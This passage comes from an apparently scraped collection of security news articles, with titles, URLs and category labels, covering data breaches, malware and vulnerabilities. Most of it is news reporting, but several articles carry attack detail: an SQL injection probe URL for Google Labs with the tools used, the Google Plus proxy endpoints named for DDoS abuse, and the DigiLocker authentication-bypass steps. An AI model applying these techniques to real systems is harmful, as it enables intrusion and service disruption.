Information Leaked Vickery has his hands on all 300GB of database contains a long list of voter records including: Full name (first, middle, last) Residential address Mailing address A unique voter ID State voter ID Gender Date of birth Date of registration Phone number Political affiliation A detailed voting history since 2000 Fields for voter prediction scores Not just his own, but Vickery also looked up a number of police officers in his city and confirmed the information was all correct. Reporters from CSO and DataBreaches.net also did the same and upheld the accuracy as well. Fortunately, the database doesn't contain Social Security Numbers, driver license numbers, or any financial data, but it's still a massive amount of data when it comes to protecting users privacy and security. What's even more Shocking? The crazy part of the data breach is no one is taking responsibility for the exposed database. Vickery, CSO and DataBreaches.net contacted various political tech groups and known voter information companies, but all denied the database belonged to them. The FBI and Internet Crime Complaint Center were all approached by Vickery and DataBreaches.net; so let's now see how long this information remains alive and accessible for anyone to see. ",Data_Breaches U.S Emergency broadcast System vulnerable to hackers,https://thehackernews.com/2013/07/us-emergency-broadcast-system.html,"A major vulnerability has been discovered in the U.S. Emergency Alert System, researchers have warned.that could allow hackers to break into the system and broadcast fake messages to the United States. According to a new report by security firm IOActive, U.S. Emergency Alert System, the system used to broadcast to the United States in times of national crisis can be hacked remotely by hackers. Recent firmware update of DASDEC-I and DASDEC-II application servers disseminated the secure shell (SSH) keys, that allows anyone with limited knowledge to log in at the root level of the server. Technically, compromising the DASDEC systems doesn't sound too difficult. In that scenario, an attacker could take over the system and issue emergency messages. Monroe Electronics was notified about vulnerabilities in its equipment in January and the company's internal development team developed a software update that was made available in March. The Emergency Alert System devices are installed at large and small broadcasters. The EAS is designed to enable to the President of the United States to speak to US citizens within 10 minutes of a major disaster occurring. These alerts were passed among stations using wire services, which connected to television and radio stations around the U.S. When a station received an official notification, it would disrupt the current broadcast to deliver the message to the public. ",Vulnerability Apple Kicks Out some Malicious Ad-Blocker Apps from its Online Store,https://thehackernews.com/2015/10/apple-security-hacked.html,"Apple has removed several apps from its official iOS App Store that have the ability to compromise encrypted connections between the servers and the end-users. Apple has officially said: We have removed a ""few"" apps from the iOS App Store that could install root certificates and allow monitoring your data. It's like- they have analyzed and admitted that they lacked in the auditing of the App Store hosted Apps. The company is also advising its users to uninstall the malicious apps from their iPhones, iPads and iPods in order to prevent themselves from monitoring, though it has yet to name the offending apps. App Store Apps Spy on Encrypted Traffic The challenge that stood before Apple was, they discovered that ""few"" of the Apps in the iOS App Store were capable of spying on the users by compromising SSL/TLS security solutions of their online communication. Root certificates are the fundamental part of how encrypted connections like HTTPS verify the site users are connecting to and creating a secure environment for them to get access to various resources. Their updates also happen on a timely basis. Root certificates allow public key encryption to browsers and other services to validate certain types of encryption and ensure that user is redirected to that website or server that he requested. However, in Apple's case, the fraudulent apps were acting as an interface between the secure connections and exposing all private Internet traffic of the user. However, to get rid of the problem, Apple has removed various apps from their App Store that could decrypt the ""Encrypted Connection"" between the user and the server to which the user is connected to. Apple Yet to Disclose the names of Offending App Apple did not disclose the names of such Apps, instead said that there are few of them with bitter intents and for which, they left the users displeased, as: They want the users to uninstall the Apps, but which ones to remove they are least bothered. Also, they have given directions for ""How to delete an app that has a configuration profile on your iPhone, iPad, or iPod touch,"" on their support page, but… ...Does that make any difference? As how are the people going to identify which Apps to uninstall! Furthermore, in a similar incident developer of an app commonly known as Been Choice was removed from the iOS store, consequently the developer posted on Twitter about they being 'Pulled Off' from iOS store and mentioned that: ""We'll remove ad blocking for FB, Google, Yahoo, and Pinterest apps."" Therefore, it can be assumed that Been Choice's, Ad-blocker app which functioned in such a way that it installs root certificates in order to block ads inside apps, might be gathering private details of the user through ad blocking facility via installing root certificates. One thing is important to note here, which is- Apple allowed such Apps that were installing Root certificates on the users' device. Meanwhile, all the iPhone, iPad and iPod touch device holders are requested to uninstall any suspicious app from there device; until Apple reveals the names of those apps. ",Vulnerability Millions of Passwords leaked from Social Site Formspring,https://thehackernews.com/2012/07/28-million-passwords-leaked-from-social.html,"Formspring, a social Q&A website popular with teenagers,this week disabled its users' passwords after discovering a security breach. Formspring founder and CEO Ade Olonoh apologized to users for the inconvenience, and advised them to change their passwords when they log back into Formspring. A blog entry posted by Formspring's CEO and founder Ade Olonoh explains that the passwords of all 28 million users have been disabled and the company was notified that 420,000 password hashes that seem to belong to its users have been posted to a security forum, and immediately began an internal investigation. Usernames and other identifying information were not posted with the passwords, but Formspring found that someone had broken into one of its development servers and stolen data from a production database. Encrypted passwords aren't immediately useable, although they can sometimes be decoded by a savvy attacker. Formspring launched in 2009 as a crowd-powered question-and-answer site. Last month, the company announced a major revamp intended to shift the site's focus toward users' interests. The company is now reviewing its security practices to ensure that a repeat of the incident does not occur.The algorithm used to hash passwords at the time of the leak was SHA-256 and the company was vigilant enough to use random salts. After this attack, however, it has updated its security stance to use bcrypt. ",Vulnerability Nemesis Bootkit — A New Stealthy Payment Card Malware,https://thehackernews.com/2015/12/nemesis-banking-malware.html,"Another day, another stunning Malware – this time targeting banks, payment card processors, and other financial services. Security researchers have uncovered a sophisticated payment card malware that executes before the operating system boots, making the malware very difficult to detect and much less remove. The malware in question is part of ""Nemesis"" – a malware suite that includes all software programs for capturing screens, transferring files, injecting processes, logging keystrokes, and carrying out other malicious activities on the infected computers. Nemesis malware family has been seen in the past, targeting banks, ATMs, financial transaction processing, credit unions, and financial business service companies. Nemesis Bootkit Malware – Reappears even after Re-installation of the OS The malware with bootkit functionality has been in operation since early this year and has the ability to modify the legitimate VBR (Volume Boot Record) that makes the malware possible to load before Windows starts. This makes the malicious threat hard to detect and remove using traditional security approaches. Moreover, the malware resides in a low-level portion of a hard drive. This makes the malware infection reappears even after the complete reinstallation of the Windows operating system. ""The malware that persists outside of the operating system (OS) requires a different approach to detection and eradication,"" security analysts from FireEye wrote in a blog post published Monday. ""Malware with bootkit functionality can be installed and executed almost entirely independent of the Windows [OS]. As a result, incident responders will need tools that can access and search raw disks at scale for evidence of bootkits."" How Does the Malware Work? Early this year, the cyber criminals tweaked Nemesis to include a utility called BOOTRASH that has the ability to modify an infected computer's boot process. In a normal boot, any Windows PC reads data from a hard drive's MBR (Master Boot Record) that loads the VBR – a piece of code specific to an operating system containing instructions for the OS to begin the boot process. The process typically looks like this: The VBR then normally loads the operating system code, but BOOTRASH loads: First, the malicious code that injects the Nemesis components stored in the virtual file system into the Windows kernel Then the Operating System code Since BOOTRASH is loaded outside of the machine's OS, it is not subject to any kind of integrity checks, nor are any of its components scanned by system's Anti-Virus program, which helps the malware evade detection. According to the researchers, versions of BOOTRASH are targeting both 32-bit and 64-bit Windows architectures. Moreover, due to this newly added Bootkit component, reinstalling the OS will not remove the Nemesis malware. Hackers behind Nemesis Malware FireEye researchers believe the Nemesis bootkit malware belongs to a financial crime group of hackers, likely based in Russia, called FIN1. ""We identified the presence of a financially motivated threat group that we track as FIN1, whose activity at the organization dated back several years,"" FireEye researcher wrote. ""The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as 'Nemesis' by the malware developer(s)."" The researchers believe that the FIN1 hacking group used this malware, most of the times, to access victims environment and steal cardholders data. In the past, the researchers came across different versions of the Nemesis family when they analyzed FIN1's malware. How to Protect Your Systems From Nemesis Bootkit Malware? Re-installing the operating system of your Windows machine is not a sufficient method to get rid of this malware. The solution against this malware threat is to use software tools that can access and scan raw disks at scale for evidence of Bootkits, or physically wipe the disks before reinstalling the operating system. ""System administrators should perform a complete physical wipe of any systems compromised with a bootkit and then reload the operating system,"" FireEye researchers recommend. Nemesis is by no means the first malware family to hijack normal boot process of a PC in an effort to gain persistence and stealth, but it is not the first malware family that contains bootkit functionality. In the past, researchers detected malicious threats such as TDL4 (Olmarik), Rovnix, Necurs, and Carberp. Among these, Carberp banking trojan targeted financial institutions. ",Malware Any Indian DigiLocker Account Could've Been Accessed Without Password,https://thehackernews.com/2020/06/aadhar-digilocker-hacked.html,"The Indian Government said it has addressed a critical vulnerability in its secure document wallet service Digilocker that could have potentially let a remote attacker bypass mobile one-time passwords (OTP) and sign in as other users. Discovered separately by two independent bug bounty researchers, Mohesh Mohan and Ashish Gahlot, the vulnerability could have been exploited easily to unauthorisedly access sensitive documents uploaded by targeted users' on the Government-operated platform. ""The OTP function lacks authorization which makes it possible to perform OTP validation with submitting any valid users details and then manipulation flow to sign in as a totally different user,"" Mohesh Mohan said in a disclosure shared with The Hacker News. With over 38 million registered users, Digilocker is a cloud-based repository that acts as a digital platform to facilitate online processing of documents and speedier delivery of various government-to-citizen services. It's linked to a user's mobile number and Aadhar ID—a unique identity number (UID) issued to every resident of India. According to Mohan, all an attacker needs to know is either victim's Aadhaar ID or linked mobile number or username to unauthorizedly access a targeted Digilocker account, prompting the service to send an OTP and subsequently exploiting the flaw to bypass the sign-in process. It's worth noting that the mobile app version of Digilocker also comes with a 4-digit PIN for an added layer of security. But the researchers said it was possible to modify the API calls to authenticate the PIN by associating the PIN to another user (identified with a version-5 UUID) and successfully login in as the victim. This means ""you can do the SMS OTP [verification] as one user and submit the pin of a second user, and finally, you will end up logging as the second user,"" Mohan said. What's more, the lack of authorization for the API endpoint used to set the secret PIN effectively implies the API can be exploited to reset the PIN linked to a random user using the individual's UUID. ""There is no session-related information on the POST request, so it's not bound to any user,"" Mohan added. In addition to the issues mentioned above, the API calls from mobile apps were secured by basic authentication that can be circumvented by removing a header flag ""is_encrypted: 1."" The application was also found to implement a weak SSL pinning mechanism, making them vulnerable to a bypass using tools like Frida. After the flaw was reported to CERT-In on May 10 by Mohan and to DigiLocker on 16th May by Ashish, the cyber agency said the issue was fixed on May 28. ""The nature of the vulnerability was such that an individual's DigiLocker account could potentially get compromised if the attacker knew the username for that particular account,"" Digilocker said in a tweet last week acknowledging the flaw. ""It was not a vulnerability that could let anyone get access to [the] DigiLocker account of anyone whose username and other details were not known."" ""Upon analysis, it was discovered that this vulnerability had crept in the code when some new features were added recently. The vulnerability was patched on a priority basis by the technical team within a day of getting the alert from CERT-In. This was not an attack on infrastructure, and no data, database, storage, or encryption was compromised,"" the team added. ",Vulnerability Sabpab - Another Mac os Backdoor Trojan Discovered,https://thehackernews.com/2012/04/sabpab-another-mac-os-backdoor-trojan.html,"Sabpab - Another Mac os Backdoor Trojan Discovered Security firm Sophos has discovered more malware for the Mac OS X platform called Sabpab. It uses the same Java vulnerability as Flashback to install itself as a ""drive-by download."" Users of older versions of Java now have still more malware to worry about. It also doesn't require any user interaction to infect a system either just like Flashback all that needs to happen is for you to visit an infected webpage. Sabpab, according to Sophos, installs a backdoor that allows the hackers to capture screen snapshots, upload or download files and execute commands on infected Macs remotely. The Trojan creates the files /Users//Library/Preferences/com.apple.PubSabAgent.pfile /Users//Library/LaunchAgents/com.apple.PubSabAGent.plist Encrypted logs are sent back to the control server, so the hackers can monitor activity. Although one variant of Flashback installed a file in the LaunchAgents folder, not all tools for detecting Flashback do anything with that folder. Symantec identifies the trojan as OSX.Sabpab which exploits the Oracle Java SE Remote Java Runtime Environment Denial Of Service Vulnerability (BID 52161) in order to install itself on to the compromised computer. Sophos products, including free Mac anti-virus for home users, detect the Trojan horse as OSX/Sabpab-A. ",Malware New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild,https://thehackernews.com/2019/10/android-kernel-vulnerability.html,"Another day, another revelation of a critical unpatched zero-day vulnerability, this time in the world's most widely used mobile operating system, Android. What's more? The Android zero-day vulnerability has also been found to be exploited in the wild by the Israeli surveillance vendor NSO Group—infamous for selling zero-day exploits to governments—or one of its customers, to gain control of their targets' Android devices. Discovered by Project Zero researcher Maddie Stone, the details and a proof-of-concept exploit for the high-severity security vulnerability, tracked as CVE-2019-2215, has been made public today—just seven days after reporting it to the Android security team. The zero-day is a use-after-free vulnerability in the Android kernel's binder driver that can allow a local privileged attacker or an app to escalate their privileges to gain root access to a vulnerable device and potentially take full remote control of the device. Vulnerable Android Devices The vulnerability resides in versions of Android kernel released before April last year, a patch for which was included in the 4.14 LTS Linux kernel released in December 2017 but was only incorporated in AOSP Android kernel versions 3.18, 4.4 and 4.9. Therefore, most Android devices manufactured and sold by a majority of vendors with the unpatched kernel are still vulnerable to this vulnerability even after having the latest Android updates, including below-listed popular smartphone models : Pixel 1 Pixel 1 XL Pixel 2 Pixel 2 XL Huawei P20 Xiaomi Redmi 5A Xiaomi Redmi Note 5 Xiaomi A1 Oppo A3 Moto Z3 Oreo LG phones Samsung S7 Samsung S8 Samsung S9 To be noted, Pixel 3, 3 XL, and 3a devices running the latest Android kernels are not vulnerable to the issue. Android Flaw Can Be Exploited Remotely According to the researcher, since the issue is ""accessible from inside the Chrome sandbox,"" the Android kernel zero-day vulnerability can also be exploited remotely by combining it with a separate Chrome rendering flaw. ""The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the Web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox,"" Stone says in the Chromium blog. ""I've attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when running locally. It only requires the untrusted app code execution to exploit CVE-2019-2215. I've also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019."" Patches to be Made Available Soon Though Google will release a patch for this vulnerability in its October's Android Security Bulletin in the coming days and also notified OEMs, most affected devices would not likely receive the patch immediately, unlike Google Pixel 1 and 2. ""This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,"" the Android security team said in a statement. ""We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update."" Google's Project Zero division usually gives software developers a 90-day deadline to fix the issue in their affected products before going public with the details and PoC exploits, but in case of active exploits, the team goes public after seven days of privately being reported. What's your take? Although this vulnerability is severe and can be used to gain root access to an Android device, users need not worry that much as the exploitation of such issues is mostly limited to targeted attack scenarios. Nevertheless, it's always a good idea to avoid downloading and installing apps from third-party app stores and any unnecessary apps, even from the Google Play Store. ",Vulnerability Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks,https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html,"Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called UNC2546. The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang. But in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms. According to Risky Business, some of the companies that have had their data listed on the site include Singapore's telecom provider SingTel, the American Bureau of Shipping, law firm Jones Day, the Netherlands-based Fugro, and life sciences company Danaher. Following the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows - CVE-2021-27101 - SQL injection via a crafted Host header CVE-2021-27102 - OS command execution via a local web service call CVE-2021-27103 - SSRF via a crafted POST request CVE-2021-27104 - OS command execution via a crafted POST request FireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is tracking the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite ""compelling"" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11. ""Many of the organizations compromised by UNC2546 were previously targeted by FIN11,"" FireEye said. ""Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020."" Once installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the ""CLOP ransomware team"" several weeks later. Lack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed. Besides urging its FTA customers to migrate to kiteworks, Accellion said fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered ""significant"" data theft. The development comes after grocery chain Kroger disclosed last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident. Then earlier today, Transport for New South Wales (TfNSW) became the latest entity to confirm that it had been impacted by the worldwide Accellion data breach. ""The Accellion system was widely used to share and store files by organisations around the world, including Transport for NSW,"" the Australian agency said. ""Before the attack on Accellion servers was interrupted, some Transport for NSW information was taken."" ",Cyber_Attack SQL Injection Vulnerability in Google Lab Database System,https://thehackernews.com/2011/06/sql-injection-vulnerability-in-google.html,"SQL Injection Vulnerability in Google Lab Database System Very Big & Critical Vulnerability detected in Google Lab System. Vendor is already reported by hackers, But they don't take positive step in this case, so finally hackers exposed the vulnerability in public by Bangladesh Cyber Army Admin - Shadman Tanjim on their Forum. Google Lab Website has SQL Injection Vulnerability and Dangerous thing is this Vulnerability is Exploitable. Hackers are able to get Tables, columns and data from Database. Google Lab Database has his own customize DB system. But Interesting things is their database system is Similar as Ms Access database. In this case Ms Access SQL Injection System is Also Work on Google Lab Database system. Statement By Hacker : I already contact with Google Corporation but they don't give positive response, I think this is their big fault, and will suffer for that. But if they give Positive response then this will be very good for them. Thanks a Ton!!! Shadman Tanjim Ethical Hacker, Programmer and Security Professional Email: admin@bdcyberarmy.com or shadman2600@gmail.com Website: www.bdcyberarmy.com/forum Greets to: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm and All Bangladesh Cyber Army Members. Video Download link: https://www.bdcyberarmy.com/Google/google_video.avi Hackers Release Step by step proof about this Vulnerability 1. Website : www.googlelabs.com or labs.google.com 2. Vulnerability type : SQL Injection 3. Vulnerable url : https://www.googlelabs.com/?q=%27&apps=Search+Labs 4. Info: Host IP: 209.85.175.141 Web Server: Google Frontend Keyword Found: Fast Injection type is Integer Let's Check Exploiting this Vulnerable link. Here Hackers use 3 Famous SQL Injection tools. They are: 1. Havij Advance SQL Injection Tool 2. Safe3 SQL Injector v8.4 3. Pangolin SQL Injection Tool 1st Work with Havij Advance SQL Injection Tool: Screen Shot 1: Scan Vulnerable link and it says this website is Vulnerable. Screen Shot 2: Now it scans and gets all tables and columns Screen Shot 3: Now you can see list of tables and Columns And this is a Prove for this Website is Genuine SQL Injection Vulnerable. Here you see this database type is MS Access, so this is a Proof of this concept. Some people should Say Google Lab Database System is not Ms Access but this Website Database is Similar as Ms Access database and Ms Access SQL Injection Query are also Work on Google Labs Database system. As like MySQL 5 and MySQL 4.1 both are injected via Union select, but both are not have Information Schema. 2nd now Work with Safe3 SQL Injector v8.4: Screen Shot 1: Analyzing Vulnerable link and it says it's vulnerable and gets keyword and db type. Screen Shot 2: Now it's Inject the vulnerable link and gets All Table list and column list This is another Prove for this Website Vulnerability and we can see this and Dangerous thing is its Exploitable. Now we check our last SQL Injection tool for 100% Satisfy. 3rd Pangolin SQL Injection Tool: Screen Shot 1: Scan vulnerable link and its say this website is vulnerable Screen Shot 2: Now inject this Website and get tables and columns list Screen Shot 3: Here is a full List of Tables and Columns list Now I think we are 100% Sure Google Lab Website is SQL Injection Vulnerable. You Can Check Video. This Video is also made by Bangladesh Cyber Army Member - Shadman Tanjim. UPDATE : Google insist that there has been no intrusion. The company claims that their GQL database won't allow SQL injection attacks. Additionally, they say that the data that appears in the screen shots, does not exist anywhere in their data stores. On this Shadman Tanjim - Hackers Reply to Google ""Proof it. because I am Also Proof it's Vulnerable. If they say's Google Lab is Not Vulnerable, It Means We get new Bugs in Some Famous SQL Injection tools. And also and 1=1 concept. So tell them to proof this and I don't think All tools are false. because 1 tools can false, 2 tools can get false but not All. ALL Tools say's it is Vulnerable, So i don't think it any confusion. :D "" ",Vulnerability T-Mobile Hacked — 2 Million Customers' Personal Data Stolen,https://thehackernews.com/2018/08/t-mobile-hack-breach.html,"T-Mobile today confirmed that the telecom giant suffered a security breach on its US servers on August 20 that may have resulted in the leak of ""some"" personal information of up to 2 million T-Mobile customers. The leaked information includes customers' name, billing zip code, phone number, email address, account number, and account type (prepaid or postpaid). However, the good news is that no financial information like credit card numbers, social security numbers, or passwords, were compromised in the security breach. According to a brief blog post published by the company detailing the incident, its cybersecurity team detected and shut down an ""unauthorized capture of some information"" on Monday, August 20. Although the company has not revealed how the hackers managed to hack into its servers neither it disclosed the exact number of customers affected by the data breach, a T-Mobile spokesperson told Motherboard that less than 3 percent of its 77 million customers were affected. The spokesperson also said that unknown hackers part of ""an international group"" managed to access T-Mobile servers through an API that ""didn't contain any financial data or other very sensitive data,"" adding ""We found it quickly and shut it down very fast."" T-Mobile said the company informed law enforcement about the security breach and is reaching out to its affected customers directly via SMS message, letter in the mail, or a phone call to notify them as well. ""We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,"" T-Mobile said. ""We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you."" The U.S. telecom giant is also encouraging affected customers to contact its customer service through 611 for any information regarding the breach. The T-Mobile incident marks the latest high-profile data breach and adds itself to the list of that other recent high profile attacks took place against Carphone Warehouse that affected its 10 million customers, and Ticketmaster that affected tens of thousands of its customers. Did you receive any notification regarding this data breach? Let us know in the comments below. ",Cyber_Attack Google Patches 6 Critical Android Mediaserver Bugs in May Security Update,https://thehackernews.com/2017/05/android-security-update.html,"In Brief Google has released its monthly security patches for Android this week, addressing 17 critical vulnerabilities, 6 of which affect Android Mediaserver component that could be used to execute malicious code remotely. Besides patches for Mediaserver, Google also fixed 4 critical vulnerabilities related to Qualcomm components discovered in Android handsets, including Google's Nexus 6P, Pixel XL, and Nexus 9 devices. According to the Google security bulletin for Android published Monday, this month's security update is one of the largest security fixes the company ever compiled in a single month. Google has split Android's monthly security bulletin into security ""patch levels"": Partial security patch level (2017-05-01) covers patches for vulnerabilities that are common to all Android devices. Complete security patch level (2017-05-05) includes additional fixes for hardware drivers as well as kernel components that are present only in some devices. Critical RCE Flaw in Android Mediaserver The most severe vulnerability exists in Mediaserver – an Android component that handles the processing of image and video files and has been a source of many issues over the past few years, including the critical Stagefright vulnerabilities. According to the search engine giant, the Mediaserver vulnerability ""could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files."" In other words, attackers could exploit the Mediaserver vulnerability by tricking users into downloading a specially crafted multimedia file on their devices, or sharing the media file via email or other messaging apps and remotely execute arbitrary code. Interestingly, this vulnerability could be triggered while you sleep, as it's not even necessary for you to open the file because as soon as your device receives the media file, the file system will cause Mediaserver to process it. The vulnerability was discovered in early January and affects Android versions 4.4.4 KitKat through 7.1.2 Nougat. Kernel-level Vulnerabilities in Qualcomm Google has also patched four critical vulnerabilities that stemmed from Qualcomm components and could allow an attacker to gain high-level (root) privileges on an Android device. Two critical vulnerabilities (CVE-2016-10275 and CVE-2016-10276) in Qualcomm bootloader create conditions ripe for an elevation of privilege attacks, enabling ""a local malicious application to execute arbitrary code within the context of the kernel,"" according to the bulletin. Another critical Qualcomm bug (CVE-2017-0604) in power driver could also allow a local malicious application to execute malicious code on the device within the context of the kernel, which is the most privileged area of the OS. No Evidence of Flaws Being Exploited in the Wild Six of the 17 critical patches are addressed with the 2017-05-01 partial security patches, while the remaining 11 critical security flaws affecting various drivers, libraries and bootloaders are patched in the 2017-05-05 complete patch level. Good news is that Google assured its users that there are no reports of any of the security vulnerabilities being exploited in the wild. Google says, having two patch levels ""provide Android partners with the flexibility to more quickly fix a subset of vulnerabilities that are similar across all Android devices."" So, users are strongly advised to download the most recent Android security update to keep their devices protected against any potential attack. Nexus and Pixel devices will receive the complete patch in an over-the-air update in the coming days, or the owners can download it directly from Google's developer site. It's also worth noting that Google revealed last week that the Nexus 6 and Nexus 9, which were released in November 2014, would no longer be ""guaranteed"" to receive security updates after October 2017. A similar timeline has been offered for newer Pixel and Pixel XL handsets of October 2019. After that, the tech giant will only push necessary security fixes to those devices. ",Vulnerability Stuxnet-like 'Havex' Malware Strikes European SCADA Systems,https://thehackernews.com/2014/06/stuxnet-like-havex-malware-strikes.html,"Security researchers have uncovered a new Stuxnet like malware, named as ""Havex"", which was used in a number of previous cyber attacks against organizations in the energy sector. Just like Famous Stuxnet Worm, which was specially designed to sabotage the Iranian nuclear project, the new trojan Havex is also programmed to infect industrial control system softwares of SCADA and ICS systems, with the capability to possibly disable hydroelectric dams, overload nuclear power plants, and even can shut down a country's power grid with a single keystroke. According to security firm F-Secure who first discovered it as Backdoor:W32/Havex.A., it is a generic remote access Trojan (RAT) and has recently been used to carry out industrial espionage against a number of companies in Europe that use or develop industrial applications and machines. SMARTY PANTS, TROJANIZED INSTALLERS To accomplish this, besides traditional infection methods such as exploit kits and spam emails, cybercriminals also used an another effective method to spread Havex RAT, i.e. hacking the websites of software companies and waiting for the targets to install trojanized versions of legitimate apps. During installation, the trojanized software setup drops a file called ""mbcheck.dll"", which is actually Havex malware, that attackers are using as a backdoor. ""The C&C server will [then] instruct infected computers to download and execute further components,"" ""We gathered and analyzed 88 variants of the Havex RAT used to gain access to, and harvest data from, networks and machines of interest. This analysis included investigation of 146 command and control (C&C) servers contacted by the variants, which in turn involved tracing around 1500 IP addresses in an attempt to identify victims."" F-Secure said. F-secure didn't mention the names of the affected vendors, but an industrial machine producer and two educational organizations in France, with companies in Germany were targeted. INFORMATION GATHERING Havex RAT is equipped with a new component, whose purpose is to gather network and connected devices information by leveraging the OPC (Open Platform Communications) standard. OPC is a communications standard that allows interaction between Windows-based SCADA applications and process control hardware. The malware scans the local network for the devices that respond to OPC requests to gather information about industrial control devices and then sends that information back to its command-and-control (C&C) server. Other than this, it also include information-harvesting tools that gather data from the infected systems, such as: Operating system related information A Credential-harvesting tool that stole passwords stored on open web browsers A component that communicates to different Command-&-Control servers using custom protocols and execute tertiary payloads in memory. ""So far, we have not seen any payloads that attempt to control the connected hardware."" F-secure confirmed. MOTIVATION? While their motivation is unclear at this point, ""We also identified an additional component used by the attackers that includes code to harvest data from infected machines used in ICS/SCADA systems. This indicates that the attackers are not just interested in compromising the networks of companies they are interested in, but are also motivated in having control of the ICS/SCADA systems in those organizations."" F-Secure noticed. HAVEX TROJAN FROM RUSSIANS ? In January this year, Cybersecurity firm CrowdStrike revealed about a cyber espionage campaign, dubbed ""Energetic Bear,"" where hackers possibly tied to Russian Federation penetrating the computer networks of energy companies in Europe, the United States and Asia. According to CrowdStrike, the Malwares used in those cyber attacks were HAVEX RAT and SYSMain RAT, and possibly HAVEX RAT is itself a newer version of the SYSMain RAT, and both tools have been operated by the attackers since at least 2011. That means, It is possible that Havex RAT could be somehow linked to Russian hackers or state-sponsored by Russian Government. ",Malware DDoS Attack Using Google Plus Servers,https://thehackernews.com/2011/08/ddos-attack-using-google-plus-servers.html,"A Security expert at Italian security firm AIR Sicurezza Informatica has claimed that Google's servers vulnerability allows a hacker to exploit the search giant's bandwidth to launch a distributed denial-of-service (DDoS) attack on any targeted server. On the IHTeam Security Blog, Simone Quatrini, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf. Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own, in an effort to prevent it from functioning. The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method) and the funny thing is that apache will log Google IP addresses. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you'll need to use /_/sharebox/linkpreview/. WORKING Using vulnerable pages i.e. ""/_/sharebox/linkpreview/"" and ""gadgets/proxy?"", it is possible to request any file type from the external source, and Google Plus servers will download it to show the content. So, if you parallelize so many requests at same time, it will be possible to perform a significant DDoS attack against any website with Google's bandwidth. ",Vulnerability Critical SQLite Flaw Leaves Millions of Apps Vulnerable to Hackers,https://thehackernews.com/2018/12/sqlite-vulnerability.html,"Cybersecurity researchers have discovered a critical vulnerability in widely used SQLite database software that exposes billions of deployments to hackers. Dubbed as 'Magellan' by Tencent's Blade security team, the newly discovered SQLite flaw could allow remote attackers to execute arbitrary or malicious code on affected devices, leak program memory or crash applications. SQLite is a lightweight, widely used disk-based relational database management system that requires minimal support from operating systems or external libraries, and hence compatible with almost every device, platform, and programming language. SQLite is the most widely deployed database engine in the world today, which is being used by millions of applications with literally billions of deployments, including IoT devices, macOS and Windows apps, including major web browsers, such as Adobe software, Skype and more. Since Chromium-based web browsers—including Google Chrome, Opera, Vivaldi, and Brave—also support SQLite through the deprecated Web SQL database API, a remote attacker can easily target users of affected browsers just by convincing them into visiting a specially crafted web-page. ""After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability,"" the researchers said in a blog post. SQLite has released updated version 3.26.0 of its software to address the issue after receiving responsible disclosure from the researchers. Google has also released Chromium version 71.0.3578.80 to patch the issue and pushed the patched version to the latest version of Google Chrome and Brave web-browsers. Tencent researchers said they successfully build a proof-of-concept exploit using the Magellan vulnerability and successfully tested their exploit against Google Home. Since most applications can't be patched anytime sooner, researchers have decided not to disclose technical details and proof-of-concept exploit code to the public. ""We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible,"" the researchers said. Since SQLite is used by everybody including Adobe, Apple, Dropbox, Firefox, Android, Chrome, Microsoft and a bunch of other software, the Magellan vulnerability is a noteworthy issue, even if it's not yet been exploited in the wild. Users and administrators are highly recommended to update their systems and affected software versions to the latest release as soon as they become available. Stay tuned for more information. ",Vulnerability "First widely distributed Android bootkit Malware infects more than 350,000 Devices",https://thehackernews.com/2014/01/first-widely-distributed-android.html,"In the last quarter of 2013, sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user. A Russian security firm 'Doctor Web' identified the first mass distributed Android bootkit malware called 'Android.Oldboot', a piece of malware that's designed to re-infect devices after reboot, even if you delete all working components of it. The bootkit Android.Oldboot has infected more than 350,000 android users in China, Spain, Italy, Germany, Russia, Brazil, the USA and some Southeast Asian countries. China seems to a mass victim of this kind of malware having a 92 % share. A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data, remove 